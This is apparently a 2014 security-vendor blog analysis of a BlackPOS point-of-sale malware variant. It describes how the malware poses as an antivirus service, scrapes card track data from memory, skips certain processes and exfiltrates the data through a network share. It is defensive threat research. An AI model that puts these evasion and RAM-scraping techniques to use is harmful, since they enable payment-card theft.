Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    October 2014
    S M T W T F S
    « Sep    
     1234
    567891011
    12131415161718
    19202122232425
    262728293031  
  • About Us

    We recently spotted a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A.  In 2012, the source code of BlackPOS was leaked, enabling other cybercriminals and attackers to enhance its code.  What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems. This routine is different from previous PoS malware such as TSPY_POCARDL.U and TSPY_POCARDL.AB (BlackPOS) that employed the targeted company’s own installed service.

    The malware can be run with options: -[start|stop|install|uninstall]. The –install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the –uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service.

    Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes.

    It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip.

    The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013.

     

    Fig1_darkpos

    Figure 1. CreateToolhelp32Snapshot to enumerate processes

    Based on our analysis, this PoS malware uses a new custom search routine to check the RAM for Track data. These custom search routines have replaced the regex search in newer PoS malware. It samples 0x20000h bytes [the 0x and h implies hex bytes] in each pass, and continues scanning till it has scanned the entire memory region of the process being inspected.

    fig2_blackpos

    Figure 2. Screenshot of reading process memory

    fig3_blackpos

    Figure 3. Logging of data

    It has an exclusion list that functions to ignore certain processes where track data  is not found. It gathers track data by scanning the memory of the all running processes except for the following:

    • smss.exe
    • csrss.exe
    • wininit.exe
    • services.exe
    • lsass.exe
    • svchost.exe
    • winlogon.exe
    • sched.exe
    • spoolsv.exe
    • System
    • conhost.exe
    • ctfmon.exe
    • wmiprvse.exe
    • mdm.exe
    • taskmgr.exe
    • explorer.exe
    • RegSrvc.exe
    • firefox.exe
    • chrome.exe

    This skipping of scanning specific processes is similar to VSkimmer (detected as BKDR_HESETOX.CC).

    In TSPY_MEMLOG.A, the grabbed credit card Track data from memory is saved into a file McTrayErrorLogging.dll and sent to a shared location within the same network. We’ve seen this routine with another BlackPOS/Kaptoxa detected as TSPY_POCARDL.AB. However, the only difference is that TSPY_MEMLOG.A uses a batch file for moving the gathered data within the shared network while TSPY_POCARDL.AB executes the net command via cmd.exe. It is highly possible that the server is compromised since the malware uses a specific username for logging into the domain.

    Data Exfiltration Mechanism

    The malware drops the component t.bat which is responsible for transferring the data from McTrayErrorLogging.dll to a specific location in the network, t:\temp\dotnet\NDP45-KB2737084-x86.exe. It uses the following command to transfer the gathered data:

    fig4_blackpos

    Figure 4. Screenshot of command used to transfer data

    The “net use” command was used to connect from one machine to another machine’s drive. It uses a specific username to login to the domain above (IP address). It will open device t: on 10.44.2.153 drive D.

    In one the biggest data breach we’ve seen in 2013, the cybercriminals behind it, offloaded the gathered data to a compromised server first while a different malware running on the compromised server uploaded it to the FTP. We surmise that this new BlackPOS malware uses the same exfiltration tactic.

    Countermeasures

    PoS malware can possibly arrive on the affected network via the following means:

    • Targeting specific servers by point of entry and lateral movement
    • Hacking network communication
    • Infect machine before deployment

    As such, we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware. For more information on PoS malware, read our white paper, Point-of-Sale System Breaches: Threats to the Retail and Hospitality Industries.

    Trend Micro protects enterprises from threats like PoS malware by detecting the malicious file.

    The related hash to this threat is  b57c5b49dab6bbd9f4c464d396414685.

    With additional analysis from Numaan Huq

    Update as of 9:44 AM, September 8, 2014

    During the course of our investigation, we spotted the following anti-American messages embedded in the binary:

    pos_malware_blackpos2

    Figure 5. Screenshot of the messages embedded in the binary

    (Click image above to enlarge)

    Note that these are not used anywhere in the code and we surmise that these may be like a signature used by the group developing this malware.

    Update as of 2:27 PM, September 11, 2014

    Even though BlackPOS ver2 has an entirely different code compared to the BlackPOS which compromised Target, it duplicates the data exfiltration technique used by the Target BlackPOS. It is an improved clone of the original, which is why we decided to call this BlackPOS ver2.

    It is also being reported in the press that some security vendors called this malware as “FrameworkPOS.”  This is a play of the service name <AV_Company> Framework Management Instrumentation with which the malware installs itself.





    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon






     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice